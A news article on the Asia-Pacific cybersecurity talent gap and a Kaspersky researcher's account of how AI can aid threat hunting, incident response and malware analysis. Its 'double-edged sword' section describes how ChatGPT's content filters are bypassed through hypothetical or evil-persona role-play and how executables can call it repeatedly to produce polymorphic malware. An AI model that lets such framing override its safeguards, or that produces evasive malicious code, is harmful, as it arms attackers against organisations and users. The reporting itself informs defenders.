In an era marked by increasing digitalization and rampant cyberthreats, the Asia-Pacific (APAC) region faces a critical challenge: a significant shortage in cybersecurity talent. Coupled with the rapid advancement of malicious techniques, there is an urgent need for innovative solutions to bolster cyber-defenses.
As of 2022, the Asia-Pacific (APAC) region had a shortfall of 2.1 million cybersecurity experts. A Kaspersky specialist has explored in depth how teams in the field of cybersecurity can leverage Artificial Intelligence (AI) to enhance their existing protective measures against the rapidly changing cyberthreats in the region.
Saurabh Sharma, who is the senior security researcher for the Global Research and Analysis Team (GReAT) in Asia-Pacific at Kaspersky, indicated that while cybercriminals may harness AI for nefarious purposes, cybersecurity units can similarly employ this technology for beneficial aims.
AI and cybersecurity in APAC’s digital economy
In 2022, the APAC region faced a 52.4% shortfall in cybersecurity talent, a critical issue as it furthers its digital economy. Specifically, Singapore experienced a 16.5% decline in cybersecurity personnel, totaling 77,425, and was one of just two markets that saw its workforce diminish.
The worldwide gap in cybersecurity talent increased by 26.2% to reach 3.42 million. The Asia-Pacific had the largest shortage, followed by Latin America with a 515,879-person deficit, and North America,which needs 436,080 professionals.
In the Asia-Pacific, 60% of survey participants acknowledged a substantial lack of cybersecurity staff in their organizations. Moreover, 56% said that this talent gap exposed their companies to moderate or high risks of cyberattacks.
The urgent need for AI in cybersecurity
“This urgent need can drive IT security teams to look into using smart machines in augmenting their organizations’ cyber defenses, and AI can help in key areas like threat intelligence, incident response, and threat analysis,” said Sharma.
Threat intelligence in cybersecurity encompasses the automation and enhancement of multiple procedures for collecting, scrutinizing, and sharing information on threats. These include:
- Threat hunting: AI can play a role in actively identifying threats that might not yet be common knowledge. This technology can help cybersecurity professionals unearth new attack methods or weaknesses by studying behavior that is unusual.
- Malware analysis: tools powered by AI can automatically analyze samples of malware, recognizing their behavior, capabilities, and likely consequences. This facilitates understanding of the purpose of the malware and the best strategies for mitigating it.
- Real-time threat detection: real-time surveillance of network traffic, activity logs, and overall system behavior is possible with AI-based security solutions. Such systems can detect abnormal or suspect behavior that could be a sign of an ongoing cyberattack.
Sharma indicated that AI algorithms can rapidly sift through and evaluate past research as well as historical tactics, techniques, and procedures (TTPs), which can culminate in the formulation of a hypothesis for threat hunting.
Kaspersky’s expert further disclosed that in the realm of cyber-incident response, AI can point out irregularities in provided logs, interpret a specific security event log, hypothesize how a certain security event log might appear, and offer guidance on locating initial points of compromise, such as web shells.
Regarding threat analysis—the phase where cybersecurity professionals delve into the workings of the tools employed in an attack—Sharma observed that technologies like ChatGPT can even aid in pinpointing key elements of malware, deciphering obfuscated scripts, and establishing decoy web servers with specific encryption methods.
The double-edged sword: ChatGPT and prompt engineering
How can all this be achieved? As CSO Online reports, recent experiments have demonstrated that seemingly harmless executable files can be engineered, upon each execution, to initiate an API call to ChatGPT. Instead of merely replicating pre-existing code samples, ChatGPT can be instructed to create fluctuating, evolving versions of malevolent code with each call, complicating the task of detection for cybersecurity mechanisms.
ChatGPT, along with other Large Language Models (LLMs), come equipped with content filters designed to prevent them from complying with requests to create detrimental content like malicious code. However, these content filters aren’t foolproof and can be circumvented.
Nearly all known potential exploits involving ChatGPT are carried out using a technique now referred to as “prompt engineering.” This involves altering the input prompts to evade the built-in content filters of the tool, thereby obtaining the intended output.
Early users discovered they could essentially “jailbreak” ChatGPT by framing queries as hypothetical situations. For instance, by asking the program to perform actions as though it were not an AI but a malevolent individual, they were able to get it to produce unauthorized content.
The ability to deceive ChatGPT into accessing its internal knowledge that is otherwise restricted by filters allows users to coax it into creating potent malicious code. This can be further optimized to produce polymorphic code by taking advantage of the model’s feature to adjust and refine the output for identical prompts if executed multiple times.
Nonetheless, Sharma pointed out the boundaries of AI in constructing and sustaining cybersecurity measures. He advised APAC businesses and organizations to:
- Prioritize enhancing current teams and processes.
- Ensure that transparency is integral to the deployment and usage of Generative AI, particularly when incorrect data is involved.
- Keep a comprehensive record of all engagements with Generative AI, make it accessible for scrutiny, and preserve it throughout the lifespan of any products integrated into corporate systems.
In conclusion, Sharma said, “AI has clear benefits for cybersecurity teams, especially in automating data collection, improving Mean Time to Resolution (MTTR), and limiting the impact of any incidents. If utilized effectively, this technology can also reduce skill requirements for security analysts. But organizations should remember that smart machines can augment and supplement human talent, but not replace it.”
Source: techwireasia.com
Leave a Comment